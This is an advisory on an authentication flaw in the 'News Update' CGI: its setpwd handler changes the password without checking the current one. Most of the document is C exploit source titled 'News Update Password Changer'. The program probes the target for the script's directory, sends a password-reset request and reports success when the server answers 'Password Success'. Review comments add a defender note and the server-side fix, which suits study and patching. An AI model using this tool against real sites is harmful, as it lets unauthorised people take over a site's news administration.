News Update was designed to assist with the building and maintaining of news areas. The CGI provides an easy interface for adding new news items, and creates the complete HTML from predefined templates.
The CGI has a built-in password protection that should prevent unauthorized users from adding or deleting news. Not only can this built-in password protection be circumvented, but it can also be made to assign a new password.
Credit:
The information has been provided by Morpheusbd.
Supplying the "setpwd" parameter causes the function "setpwd" to be called; this function allows the current password to be changed.
The "setpwd" parameter needs two additional parameters: "pwd" and "pwd2".
The parameter "pwd" contains the new password.
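The parameter "pwd2" is used as a confirmation of the first one, "pwd". Note: The original password isn't required for any of these actions. In other words, the password-change handler does not authenticate the requester, so the fix belongs in the CGI itself: it has to verify the current password before it accepts a new one.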
/***************************************************************************
 * Standard disclaimer applies here. Do not use this program. This program
 * is only for educational purposes. Use it at your own risk.
 ***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
/*
 * Output selection. At the moment everything is written to stdout.
 * DEBUG (defined outside this listing) is compared against the two values
 * below to decide which class of message is printed.
 * NOTE(review): both values are 2 as published, so DEBUG == 2 enables both
 * classes at once.
 */
#define EXPLOIT_INFO 2 /* result messages; to see only these, change this value to 1 and DEBUG to 1 */
#define DEBUG_INFO 2 /* request/response trace; to see these, set DEBUG to 2 */
/*
 * Hand out one byte from fd through a private 4096-byte buffer, refilling
 * the buffer with read() whenever it runs empty.
 * (Taken from UNIX Network Programming - Vol. I by W.R. Stevens.)
 *
 * Returns 1 and stores the byte in *ptr, 0 when read() reports end of file,
 * or -1 when read() fails with anything other than EINTR.
 *
 * The buffer and its cursor live in static storage, so they are shared by
 * every descriptor passed in: bytes still buffered from one descriptor are
 * returned on the next call whatever fd that call names.
 */
static ssize_t my_read(int fd, char *ptr)
{
    static char pending[4096];
    static char *cursor;
    static int remaining = 0;

    while (remaining <= 0) {
        remaining = read(fd, pending, sizeof(pending));
        if (remaining > 0) {
            cursor = pending;
            break;
        }
        if (remaining == 0) {
            return (0);
        }
        /* read() failed: retry only when it was interrupted by a signal */
        if (errno != EINTR) {
            return (-1);
        }
    }

    remaining -= 1;
    *ptr = *cursor;
    cursor += 1;
    return (1);
}
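/*
 * Read one line from fd into the buffer at vptr.
 * (Taken from UNIX Network Programming - Vol. I by W.R. Stevens.)
 *
 * At most maxlen - 1 bytes are stored, followed by a terminating NUL. A
 * newline ends the line and is kept in the buffer, like fgets().
 *
 * Returns the number of bytes stored (the NUL not counted), 0 when end of
 * file is reached before any byte was read, or -1 on error. errno is set by
 * read() for I/O errors and to EINVAL for a NULL or zero-length buffer.
 *
 * The listing as published stops right after the loop. The terminating NUL,
 * the return value and the closing brace below complete the function; the
 * callers in this file pass the buffer to strstr() and printf("%s"), which
 * both need the terminator.
 */
ssize_t readline(int fd, void *vptr, size_t maxlen)
{
    char *start = vptr;
    char *ptr = start;
    char c;

    /* No room even for the terminator: refuse instead of writing past the buffer. */
    if (start == NULL || maxlen == 0) {
        errno = EINVAL;
        return (-1);
    }

    /* Unsigned arithmetic throughout, so maxlen is never compared with a signed int. */
    while ((size_t)(ptr - start) < maxlen - 1) {
        ssize_t rc = my_read(fd, &c);

        if (rc == 0) {
            break;          /* EOF; whatever was read so far is returned */
        }
        if (rc != 1) {
            return (-1);    /* error, errno set by read() */
        }
        *ptr++ = c;
        if (c == '\n') {
            break;          /* newline is stored, like fgets() */
        }
    }

    *ptr = '\0';
    return ((ssize_t)(ptr - start));
}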
/*
 * Sends the password-change request for the News Update CGI to host and
 * reports whether the server accepted it.
 * (Original comment, translated: "Exploits the News Update script and
 * injects a new password.")
 *
 * host: server name or address handed to http_connection().
 * path: request path substituted into the NEWS_UPDATE_PWD template.
 *
 * Returns 0 as soon as a response line contains "Password Success", and -1
 * when the response ends without that marker. Exits the process when the
 * request cannot be written.
 *
 * NOTE(review): NEWS_UPDATE_PWD, PWD, BROWSER, MAXBUFFER, DEBUG, the colour
 * macros (ROT, GELB, GRUEN, BLAU, WEISS), http_connection() and writen() are
 * defined outside this listing. Presumably the template carries the
 * setpwd/pwd/pwd2 parameters described in the advisory text -- confirm
 * against the full source.
 *
 * Defender note: the only credential among the format arguments is PWD, the
 * new password, passed twice; nothing resembling the current password is
 * sent. A server that answers such a request with "Password Success" has
 * changed its password without authenticating the requester. The server-side
 * fix is to verify the current password before honouring a change.
 */
int news_update_exploit(char *host, char *path)
{
int i = 0, sockfd = 0;
char cmd[MAXBUFFER];
/* NOTE(review): the bare "return;" below yields no value although the function is declared int. */
if ((sockfd = http_connection(host)) == -1) { ROT; printf("Damn ... no connection to %s\n", host); WEISS; return; }
/*
 * Build the request in cmd. NOTE(review): 34 + strlen(PWD) looks like a body
 * length, which would mean the parameters travel in a request body rather
 * than in the URL -- confirm. If so, web access logs would show only the
 * request for the script path, not the parameters.
 */
i = snprintf(cmd, sizeof(cmd), NEWS_UPDATE_PWD, path, host, "www.brightdarkness.de", BROWSER, 34 + strlen(PWD), PWD, PWD);
GELB;
/* The 80 printed here is a literal; the port actually used is chosen inside http_connection(). */
if (DEBUG == DEBUG_INFO) { GELB; printf("Sending following request to %s[%d]:\n%s", host, 80, cmd); WEISS; }
WEISS;
/* i is the length snprintf() reported, which is larger than sizeof(cmd) if the request was truncated. */
if (writen(sockfd, cmd, i) == -1)
{
ROT;
printf("Man, man, man ....... Ihr verdammten Idioten .... kann man hier nicht mal in Ruhe writen() ?\n");
WEISS;
exit(-1);
}
GELB;
if (DEBUG == DEBUG_INFO) printf("Output from Server:\n");
WEISS;
/* cmd is reused as the receive buffer; the response is scanned line by line until readline() returns 0. */
while (readline(sockfd, cmd, MAXBUFFER) != 0)
{
BLAU;
if (DEBUG == DEBUG_INFO) printf("%s", cmd);
WEISS;
/* Success is detected only by this marker string appearing in a response line. */
if (strstr(cmd, "Password Success") != NULL)
{
GRUEN;
if (DEBUG == EXPLOIT_INFO) printf("Exploit: Success!!!!\n");
if (DEBUG == EXPLOIT_INFO) printf("The new password: %s\n", PWD);
WEISS;
/* sockfd is not closed on this path, nor on the failure path below. */
return (0);
}
}
ROT;
if (DEBUG == EXPLOIT_INFO) printf("Exploit: failed.\n");
WEISS;
return (-1);
}
/*
 * Print the program banner and the command-line synopsis to stdout, then
 * terminate the process with exit(-1).
 *
 * arg: program name shown in front of the synopsis (main passes argv[0]).
 *
 * ROT, GELB, GRUEN and WEISS are macros defined outside this listing;
 * presumably they switch the output colour (the names are German colour
 * words) -- confirm against the full source.
 */
void usage(char *arg)
{
    ROT;
    fputs("news_update_exploit - News Update Password Changer - v0.1\n", stdout);
    fputs("------------=====||| by Morpheus[bd] |||=====------------\n", stdout);

    GELB;
    fputs("\nUsage:", stdout);

    GRUEN;
    fprintf(stdout, "%s host/ip [path]\n\n", arg);
    fputs("path: alternative path to the newsup.pl\n", stdout);

    WEISS;
    exit(-1);
}
/*
 * Checks whether a path exists on the target web server.
 * (Original comment, translated: "Does the directory of the form exist at
 * all?")
 *
 * host: server name or address handed to http_connection().
 * ptr:  path substituted into the SIMPLE_REQUEST template.
 *
 * Returns 0 when the first response line does not contain "404" and -1 when
 * it does. Exits the process when the request cannot be written or when no
 * response line can be read.
 *
 * NOTE(review): SIMPLE_REQUEST, MAXBUFFER, DEBUG, the colour macros,
 * http_connection() and writen() are defined outside this listing.
 */
int check_directory(char *host, char *ptr)
{
int i = 0, sockfd = 0;
/* ptr2 is declared but never used in this function. */
char cmd[MAXBUFFER], *ptr2;
GELB;
if (DEBUG == DEBUG_INFO) printf("Checking if %s exists on the target server...\n", ptr);
WEISS;
/* NOTE(review): the bare "return;" below yields no value although the function is declared int. */
if ((sockfd = http_connection(host)) == -1) { ROT; printf("Damn !!!... No connection to %s.\n", host); WEISS; return; }
i = snprintf(cmd, sizeof(cmd), SIMPLE_REQUEST, ptr, host);
GELB;
/* The 80 printed here is a literal; the port actually used is chosen inside http_connection(). */
if (DEBUG == DEBUG_INFO) printf("Sending following request to %s[%d]:\n%s", host, 80, cmd);
WEISS;
if (writen(sockfd, cmd, i) == -1)
{
ROT;
printf("Man, man, man ....... Ihr verdammten Idioten .... kann man hier nicht mal in Ruhe writen() ?\n");
WEISS;
exit(-1);
}
/* Only the first response line is inspected. A readline() result of -1 (read error) is not caught by this == 0 test. */
if (readline(sockfd, cmd, MAXBUFFER) == 0)
{
ROT;
printf("Error: Reading from HTTP Server.\n");
WEISS;
exit(-1);
}
/*
 * The test is a substring match on "404" anywhere in that line, so every
 * other response (a 403 or 500, for example) is reported as "found".
 */
if (strstr(cmd, "404") == NULL)
{
GRUEN;
if (DEBUG == DEBUG_INFO) printf("The directory was found.\n");
WEISS;
/*
 * Drain the rest of the response. my_read() keeps its buffer in static
 * storage shared by all descriptors, so bytes left over from this connection
 * would otherwise be returned by the first reads on the next one.
 */
while (readline(sockfd, cmd, MAXBUFFER) != 0);
close(sockfd);
return (0);
}
if (DEBUG == DEBUG_INFO) printf("The directory was NOT found.\n");
/* Same drain as on the "found" path before the socket is closed. */
while (readline(sockfd, cmd, MAXBUFFER) != 0);
close(sockfd);
return (-1);
}
/*
 * Program entry point.
 * (Original comment, translated: "The main program.")
 *
 * argv[1] is the target host or IP; the optional argv[2] is an alternative
 * directory for the script. With fewer than two arguments usage() is called,
 * which exits. Otherwise the directory is probed with check_directory(),
 * NEWS_UPDATE is appended to it, and the result is passed to
 * news_update_exploit().
 *
 * Returns 0 regardless of what news_update_exploit() returns; exits with -1
 * when the directory check fails.
 *
 * NOTE(review): MAXBUFFER, NEWS_UPDATE, NEWSUPDATE_PATH and the colour
 * macros are defined outside this listing.
 */
int main(int argc, char **argv)
{
char buf[MAXBUFFER];
if (argc < 2)
{
usage(argv[0]);
}
if (argc >= 3)
{
/* An alternative directory was passed as a parameter */
/* NOTE(review): strncpy() leaves buf without a terminating NUL when argv[2] is sizeof(buf) bytes or longer. */
strncpy(buf, argv[2], sizeof(buf));
if (check_directory(argv[1], buf) == -1)
{
ROT;
printf("Error: The given directory was not found.\nPlease provide a different directory.\n");
WEISS;
exit(-1);
}
/* NOTE(review): strcat() appends without checking the space left in buf. */
strcat(buf, NEWS_UPDATE);
}
else
{
/* No alternative directory given, use the default directory */
strncpy(buf, NEWSUPDATE_PATH, sizeof(buf));
if (check_directory(argv[1], buf) == -1)
{
ROT;
printf("Error: The given directory was not found.\nPlease provide a different directory.\n");
WEISS;
exit(-1);
}
strcat(buf, NEWS_UPDATE);
}
/* The return value of the call below is discarded. */
news_update_exploit(argv[1], buf);
return (0);
}